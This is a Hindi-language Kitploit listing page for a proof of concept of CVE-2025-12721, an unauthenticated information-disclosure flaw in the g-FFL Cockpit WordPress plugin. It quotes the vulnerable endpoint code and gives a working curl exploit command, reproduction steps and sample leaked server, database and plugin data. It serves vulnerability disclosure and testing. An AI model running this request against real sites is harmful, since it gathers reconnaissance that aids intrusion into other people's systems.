Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-12721 — g-FFL Cockpit <= 1.7.1 - प्राधिकरण की कमी से अनधिकृत जानकारी प्रकटीकरण | Kitploit
उपकरण/GitHubGitHub/d0n601/cve-2025-12721
भेद्यता विश्लेषणशोषणजानकारी एकत्र करनावेब सुरक्षापेनिट्रेशन टेस्टिंगगलत कॉन्फ़िगरेशन
GitHubd0n601/cve-2025-12721

CVE-2025-12721

g-FFL Cockpit <= 1.7.1 - प्राधिकरण की कमी से अनधिकृत जानकारी प्रकटीकरण

रिपॉजिटरी देखें
9 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

g-FFL Cockpit <= 1.7.1 - अप्रमाणित सूचना प्रकटीकरण

g-FFL Cockpit प्लगइन server_status REST API एंडपॉइंट पर उचित प्राधिकरण जांच लागू नहीं करता है, जिससे अप्रमाणित उपयोगकर्ता एक उजागर सार्वजनिक एंडपॉइंट के माध्यम से संवेदनशील सर्वर कॉन्फ़िगरेशन जानकारी, PHP सेटिंग्स, डेटाबेस विवरण, WordPress इंस्टॉलेशन मेटाडेटा और सक्रिय प्लगइन जानकारी तक पहुंच प्राप्त कर सकते हैं।

TL;DR शोषण

root@kitploit:~
TARGET_SITE="http://example.com"
curl -X GET $TARGET_SITE/wp-json/fflcockpit/v1/server_status | jq

विवरण

handle_server_status() फंक्शन includes/class-sync-endpoint.php में बिना किसी प्रमाणीकरण या क्षमता जांच की आवश्यकता के व्यापक सर्वर जानकारी प्राप्त और प्रकट करता है। एंडपॉइंट को permission_callback => '__return_true' के साथ पंजीकृत किया गया है, जो इसे किसी भी अप्रमाणित आगंतुक के लिए पूरी तरह से सुलभ बनाता है।

यहाँ स्थित है class-sync-endpoint.php:

root@kitploit:~
88:        register_rest_route('fflcockpit/v1', '/server_status', [
89:            'methods' => 'GET',
90:            'callback' => [__CLASS__, 'handle_server_status'],
91:            'permission_callback' => '__return_true', // सार्वजनिक एंडपॉइंट
92:        ]);

handle_server_status() फंक्शन निम्नलिखित को उजागर करता है:

  • सर्वर जानकारी: PHP संस्करण, ऑपरेटिंग सिस्टम, सर्वर सॉफ्टवेयर, आर्किटेक्चर, सर्वर लोड
  • मेमोरी उपयोग: वर्तमान मेमोरी उपयोग, पीक मेमोरी, मेमोरी सीमाएं, उपयोग प्रतिशत
  • PHP कॉन्फ़िगरेशन: मेमोरी सीमा, निष्पादन समय सीमाएं, अपलोड सीमाएं, अधिकतम इनपुट वेरिएबल्स, OPcache स्थिति
  • PHP एक्सटेंशन: लोडेड एक्सटेंशन स्थिति (curl, gd, imagick, mbstring, mysql, zip, xml, json, openssl, fileinfo)
  • डेटाबेस जानकारी: MySQL संस्करण, डेटाबेस charset/collation, MySQL कॉन्फ़िगरेशन वेरिएबल्स, डेटाबेस आकार, क्वेरी गणना
  • डिस्क स्थान: खाली और कुल डिस्क स्थान, उपयोग प्रतिशत
  • WordPress जानकारी: WordPress संस्करण, मल्टीसाइट स्थिति, डीबग मोड स्थिति, संस्करणों और लेखकों के साथ सक्रिय प्लगइन्स की सूची
  • WooCommerce जानकारी: इंस्टॉलेशन स्थिति, संस्करण, API सेटिंग्स, उत्पाद/ऑर्डर गणना, सत्र हैंडलर कॉन्फ़िगरेशन
  • प्रदर्शन संकेतक: मेमोरी थ्रेशोल्ड, निष्पादन समय जांच, OPcache स्थिति, डिस्क स्थान चेतावनियां, MySQL कॉन्फ़िगरेशन विश्लेषण

से class-sync-endpoint.php असुरक्षित स्निपेट:

root@kitploit:~
1443:                'php_version' => phpversion(),
1444:                'operating_system' => defined('PHP_OS') ? PHP_OS : 'Unknown',
1445:            ];
1446:            
1447:            if (isset($_SERVER['SERVER_SOFTWARE'])) {
1448:                $server_info['server_software'] = $_SERVER['SERVER_SOFTWARE'];
1449:            }

में अतिरिक्त प्रकटीकरण class-sync-endpoint.php:

root@kitploit:~
1645:                $active_plugins_list = get_option('active_plugins', []);
1646:                $wp_info['active_plugins_count'] = count($active_plugins_list);
1647:                
1648:                if (!function_exists('get_plugins')) {
1649:                    require_once ABSPATH . 'wp-admin/includes/plugin.php';
1650:                }
1651:                $all_plugins = get_plugins();
1652:                
1653:                $plugin_details = [];
1654:                foreach ($active_plugins_list as $plugin_path) {
1655:                    if (isset($all_plugins[$plugin_path])) {
1656:                        $plugin_info = $all_plugins[$plugin_path];
1657:                        $plugin_details[] = [
1658:                            'name' => $plugin_info['Name'] ?? 'Unknown',
1659:                            'version' => $plugin_info['Version'] ?? 'Unknown',
1660:                            'author' => isset($plugin_info['Author']) ? strip_tags($plugin_info['Author']) : 'Unknown',
1661:                            'description' => isset($plugin_info['Description']) ? wp_trim_words(strip_tags($plugin_info['Description']), 20) : '',
1662:                            'path' => $plugin_path,
1663:                            'network' => $plugin_info['Network'] ?? false,
1664:                        ];
1665:                    }
1666:                }

मैन्युअल पुनरुत्पादन

नोट: g-FFL Cockpit को WooCommerce की आवश्यकता है

  1. लक्ष्य WordPress साइट पर नेविगेट करें जहाँ g-FFL Cockpit प्लगइन इंस्टॉल है।

  2. सर्वर स्थिति जानकारी प्राप्त करने के लिए निम्नलिखित curl कमांड निष्पादित करें:

root@kitploit:~
curl -X GET http://example.com/wp-json/fflcockpit/v1/server_status
  1. आपको व्यापक सर्वर कॉन्फ़िगरेशन, PHP सेटिंग्स, डेटाबेस जानकारी, WordPress और WooCommerce विवरण, और सक्रिय प्लगइन्स की पूरी सूची वाली एक JSON प्रतिक्रिया प्राप्त होगी:
root@kitploit:~
{
  "plugin": {
    "name": "FFL Cockpit",
    "version": "1.7.1"
  },
  "timestamp": "2024-01-15T12:34:56Z",
  "server": {
    "php_version": "8.1.27",
    "operating_system": "Linux",
    "server_software": "Apache/2.4.57",
    "architecture": "x86_64",
    "server_load": [0.52, 0.48, 0.45]
  },
  "memory_usage": {
    "current": "45.23 MB",
    "current_bytes": 47415296,
    "peak": "52.18 MB",
    "peak_bytes": 54722560,
    "limit": "256 MB",
    "limit_bytes": 268435456,
    "usage_percentage": 17.67
  },
  "php_config": {
    "memory_limit": "256M",
    "max_execution_time": "300",
    "max_input_vars": "3000",
    "post_max_size": "64M",
    "upload_max_filesize": "64M",
    "max_file_uploads": "20",
    "opcache_enabled": true,
    "opcache_memory_consumption": 67108864,
    "opcache_hit_rate": 95.23
  },
  "php_extensions": {
    "curl": true,
    "gd": true,
    "imagick": true,
    "mbstring": true,
    "mysql": true,
    "zip": true,
    "xml": true,
    "json": true,
    "openssl": true,
    "fileinfo": true
  },
  "database": {
    "mysql_version": "8.0.35",
    "charset": "utf8mb4",
    "collate": "utf8mb4_unicode_ci",
    "queries_this_request": 42,
    "mysql_config": {
      "max_connections": "151",
      "max_allowed_packet": "67108864",
      "innodb_buffer_pool_size": "134217728"
    },
    "database_size": 125.43
  },
  "disk_space": {
    "free": "15.23 GB",
    "free_bytes": 16357785600,
    "total": "50.00 GB",
    "total_bytes": 53687091200,
    "used_percentage": 69.51
  },
  "wordpress": {
    "version": "6.4.2",
    "multisite": false,
    "debug_enabled": false,
    "cache_enabled": false,
    "active_plugins_count": 12,
    "active_plugins": [
      {
        "name": "g-FFL Cockpit",
        "version": "1.7.1",
        "author": "Garidium LLC",
        "description": "g-FFL Cockpit",
        "path": "g-ffl-cockpit/g-ffl-cockpit.php",
        "network": false
      }
    ]
  },
  "woocommerce": {
    "is_installed": true,
    "version": "8.5.2",
    "api_enabled": true,
    "product_count": 1250,
    "order_count": 342
  }
}
टूल डाउनलोड करें